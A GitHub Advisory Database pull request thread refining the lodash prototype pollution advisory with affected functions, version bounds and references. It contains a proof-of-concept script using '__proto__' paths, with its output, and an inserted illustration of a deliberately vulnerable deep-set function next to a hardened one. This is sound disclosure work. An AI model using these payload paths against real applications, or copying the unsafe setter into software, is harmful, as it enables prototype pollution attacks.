
Conversation

jkmartindale
@jkmartindale jkmartindale commented Oct 24, 2023

Updates

  • Affected products
  • Description
  • References

Comments

Added function names

The root cause of this vulnerability is internal function baseSet, which is used by multiple public functions in addition to zipObjectDeep. This pull request adds those additional vulnerable functions to the description, as they may not be obvious to analysts determining if their codebase is affected. For example, https://hackerone.com/reports/864701 is essentially a duplicate of the HackerOne report that created this CVE due to the shared root cause. However, it was awarded a bounty (and received a separate Snyk entry) because it is not obvious from the older HackerOne disclosure or CVE description that set and setWith are also affected by the same bug.

This is the PoC I've been using to check affected versions:

// run.js
// Each call below writes through the same internal baseSet path. If the
// installed lodash is vulnerable, the write lands on Object.prototype and the
// bare identifier (test1, test2, ...) resolves through the global object's
// prototype chain, so the console.log prints the marker string. On a patched
// version the identifier is undefined, the ReferenceError is swallowed by the
// empty catch, and only "Tests complete." follows the version line.
const _ = require('lodash')
console.log(`Lodash version ${_.VERSION}`)
try {
    _.set({}, "__proto__.test1", "set() vulnerable")
    console.log(test1)
} catch {}
try {
    _.setWith({}, "__proto__.test2", "setWith() vulnerable")
    console.log(test2)
} catch {}
try {
    _.zipObjectDeep(["__proto__.test3"], ["zipObjectDeep() vulnerable"])
    console.log(test3)
} catch {}
try {
    _.update({}, "__proto__.test4", (x) => "update() vulnerable")
    console.log(test4)
} catch {}
try {
    // customizer Object keeps the intermediate container creation on the default path
    _.updateWith({}, "__proto__.test5", (x) => "updateWith() vulnerable", Object)
    console.log(test5)
} catch {}
try {
    // pick resolves the requested path on the source and then writes it via baseSet
    _.pick({ __proto__: { test6: "pick() vulnerable" } }, ["__proto__.test6"])
    console.log(test6)
} catch {}
console.log("Tests complete.")

For completeness' sake, pickBy also uses baseSet, but it isn't vulnerable because it iterates over a list of enumerable properties and doesn't access arbitrary paths provided in the function call.

Affected versions

Lower bound

The above PoC found that the oldest vulnerable version of Lodash is 3.7.0, which introduces the set function (with the vulnerable functionality eventually moving to baseSet). All the other vulnerable functions were added later. pick is technically older than set, but its behavior matches that of the non-vulnerable pickBy until lodash/lodash@fd526e8 in v4.0.0.

Upper bound

The PoC above found that the fix was added in 4.17.17:

$ npm install lodash@4.17.16 && node run.js

added 1 package, and audited 3 packages in 3s

found 0 vulnerabilities
Lodash version 4.17.16
set() vulnerable
setWith() vulnerable
zipObjectDeep() vulnerable
update() vulnerable
updateWith() vulnerable
pick() vulnerable
Tests complete.

$ npm install lodash@4.17.17 && node run.js

changed 1 package, and audited 3 packages in 4s

found 0 vulnerabilities
Lodash version 4.17.17
Tests complete.

4.17.17 also matches the patch version listed in SNYK-JS-LODASH-608086, which was created in response to the second HackerOne disclosure of this vulnerability.

However, the Lodash changelog lists the fix under 4.17.19 and says that versions 4.17.16–4.17.18 were corrupted (which doesn't match my current experience, but whatever).

lodash-es doesn't have releases for versions 4.17.16–4.17.19, so its earliest patched version would be 4.17.20. I was unable to find an issue in this repository explaining the discrepancy in affected version between the advisory details (4.17.19) and metadata (4.17.20), but I'm assuming it's because NVD has no way to differentiate lodash and lodash-es given that they're the same library with differing packaging.

References

Replaced the link to a deleted GitHub issue with an archive link and added a link to https://hackerone.com/reports/864701, which is a second disclosure for this vulnerability focusing on set and setWith.
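The following is an added illustration, not code from the PR above, from lodash, or from the advisory: a minimal deep-set written in the style of lodash's internal baseSet (the shared root cause the comment identifies), first in a vulnerable form that reproduces the `__proto__` path traversal the PoC exercises through set/setWith/zipObjectDeep/update/updateWith/pick, then with the key check that blocks it. The function names (`unsafeDeepSet`, `safeDeepSet`, `pollutes`) and the sample paths are my own and do not correspond to lodash's API.

```javascript
// Added example (not lodash code, not from the advisory PR). Demonstrates why a
// baseSet-style deep setter is a prototype pollution sink and what the fix
// needs to check. Names and sample paths below are illustrative assumptions.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// "a.b.c" -> ["a", "b", "c"]; an array is taken as an already-split path.
function toPath(path) {
  return Array.isArray(path) ? path.map(String) : String(path).split('.');
}

// Vulnerable variant: every segment is resolved with plain property access, so
// "__proto__" (or "constructor" then "prototype") walks up to Object.prototype
// and the final assignment lands there, affecting every object in the process.
function unsafeDeepSet(target, path, value) {
  const keys = toPath(path);
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    if (cur[keys[i]] == null) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Hardened variant: reject prototype-reaching segments up front, and only
// descend into own plain-object properties so an inherited value can never
// become the write target.
function safeDeepSet(target, path, value) {
  const keys = toPath(path);
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) {
      throw new TypeError(`refusing to traverse prototype key "${k}"`);
    }
  }
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    const own = Object.prototype.hasOwnProperty.call(cur, k);
    if (!own || typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Runs one setter with an attacker-style path against a throwaway object and
// reports whether an unrelated object picked up the property, i.e. whether
// Object.prototype was polluted. Cleans up afterwards so the pollution does
// not leak into later code.
function pollutes(setter, path, marker) {
  const bystander = {};
  let hit = false;
  try {
    setter({}, path, 'polluted');
    hit = bystander[marker] === 'polluted';
  } catch (e) {
    hit = false; // the hardened setter throws before writing anything
  } finally {
    delete Object.prototype[marker];
  }
  return hit;
}

// Stand-alone demo: the unsafe setter reports true for both attacker paths,
// the safe one reports false and still performs ordinary nested writes.
console.log('unsafeDeepSet __proto__ path   :', pollutes(unsafeDeepSet, '__proto__.zz', 'zz'));
console.log('unsafeDeepSet constructor path :', pollutes(unsafeDeepSet, 'constructor.prototype.zz', 'zz'));
console.log('safeDeepSet   __proto__ path   :', pollutes(safeDeepSet, '__proto__.zz', 'zz'));
console.log('safeDeepSet   constructor path :', pollutes(safeDeepSet, 'constructor.prototype.zz', 'zz'));
console.log('safeDeepSet   normal write     :', JSON.stringify(safeDeepSet({ a: { x: 1 } }, 'a.b.c', 2)));
```

The `pollutes` helper checks a bystander object rather than the target, which is the property that matters for this bug class: the write is visible from every object in the runtime, not just the one passed in. The `constructor.prototype` path is included because a filter that only rejects the literal `__proto__` segment still leaves that route open.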

@github-actions github-actions bot changed the base branch from main to jkmartindale/advisory-improvement-2884 October 24, 2023 00:37
@darakian

Many thanks for the contribution, the great write up and concise POC. I'll add this PR as a reference as well 👍

@advisory-database advisory-database bot merged commit c3105c8 into jkmartindale/advisory-improvement-2884 Oct 24, 2023
@advisory-database advisory-database bot deleted the jkmartindale-GHSA-p6mc-m468-83gw branch October 24, 2023 20:06
@advisory-database

Hi @jkmartindale! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!
